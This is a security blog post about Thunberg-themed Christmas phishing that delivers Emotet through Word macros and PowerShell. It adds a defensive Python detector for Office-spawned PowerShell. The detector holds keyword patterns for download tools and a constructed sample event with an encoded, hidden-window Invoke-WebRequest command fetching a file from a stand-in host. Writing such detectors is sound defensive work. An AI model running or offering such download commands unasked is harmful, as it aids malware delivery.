A number of phishing campaigns have been using Christmas-themed emails encouraging recipients to support climate activist Greta Thunberg, according to Paul Ducklin at Naked Security. Scammers often exploit people’s charitable impulses in order to trick them into handing over their money, but these climate change-themed emails contain links or attachments meant to deliver malware. While the download links in the emails aren’t currently functional, the malicious attachments will result in the installation of the Emotet banking Trojan.
The attachments are Microsoft Word documents which, when opened, display an image with text informing the recipient that they’ll have to click the “Enable content” and “Enable editing” buttons in order to view the contents of the document. Clicking these buttons will allow the file to run a macro which will execute a PowerShell command to download the malware. Once Emotet is installed, the attackers can essentially do whatever they want with the infected computer, which often includes downloading additional malware.
While this specific attack delivered Emotet, Ducklin explains that this type of infection chain allows the attackers to customize their payload based on the target.
“Remember that when malware arrives in a multi-step chain, like here, you can never be quite sure what comes next,” Ducklin writes. “That’s one reason the crooks like to deliver their final malware payloads via a web download that happens at the time and place that your infection started. That way they can tailor the final malware not only by time, but also by your geolocation and even by what type of computer you’ve got. For example, if your laptop turns out to be a Mac, some crooks will deliberately try to hit you with Mac-specific malware instead of sending you a Windows program that isn’t going to run at all.”
Many malware attacks would be prevented if every employee knew that they should never click “Enable editing” or “Enable content” in a Microsoft Office document, especially if they’ve just received the document in an email. Even more attacks could be thwarted if employees were taught to avoid clicking on suspicious links or opening unsolicited attachments. New-school security awareness training can create a culture of security within your organization by teaching your employees about social engineering tactics.
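The chain described above (a Word macro launching PowerShell to download the payload) can also be caught in process-creation logs. The following is an added example, not code from Naked Security or the original post: it flags PowerShell started by an Office application and decodes any `-EncodedCommand` argument to look for download activity. The event field names, the severity labels and the sample events are assumptions constructed for illustration.

```python
import base64
import re

# Assumed event shape: dicts with parent_image, image and command_line
# (the fields a process-creation log such as Sysmon Event ID 1 records).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}
DOWNLOAD_HINTS = re.compile(
    r"invoke-webrequest|net\.webclient|downloadfile|downloadstring|start-bitstransfer", re.I
)
# -EncodedCommand may be abbreviated (-e, -ec, -enc, ...).
ENCODED_ARG = re.compile(r"(?<!\S)-(?:e|ec|en[a-z]*)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(command_line):
    """Return the decoded -EncodedCommand text (base64 over UTF-16LE), or ''."""
    match = ENCODED_ARG.search(command_line)
    if not match:
        return ""
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except ValueError:  # bad base64 and bad UTF-16 both derive from ValueError
        return ""


def triage(event):
    """Return 'high', 'medium' or None for one process-creation event."""
    parent = event["parent_image"].rsplit("\\", 1)[-1].lower()
    child = event["image"].rsplit("\\", 1)[-1].lower()
    if parent not in OFFICE_PARENTS or child not in SHELLS:
        return None  # not an Office application spawning PowerShell
    text = event["command_line"] + " " + decode_encoded_command(event["command_line"])
    # Office starting PowerShell is already unusual; a download makes it urgent.
    return "high" if DOWNLOAD_HINTS.search(text) else "medium"


# Constructed sample events (not taken from the campaign).
_ENC = base64.b64encode(
    "Invoke-WebRequest -Uri http://example.invalid/ -OutFile out.bin".encode("utf-16-le")
).decode()
WORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"parent_image": WORD, "image": PS, "command_line": f"powershell.exe -w hidden -enc {_ENC}"},
    {"parent_image": WORD, "image": PS, "command_line": "powershell.exe -NoProfile Get-Date"},
    {"parent_image": r"C:\Windows\explorer.exe", "image": PS, "command_line": "powershell.exe Get-ChildItem"},
]
```

The first sample event scores `high` only because the encoded argument is decoded before matching; the raw command line contains no download keyword.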
Naked Security has the story: https://nakedsecurity.sophos.com/2019/12/27/christmas-malware-uses-support-greta-thunberg-as-a-lure/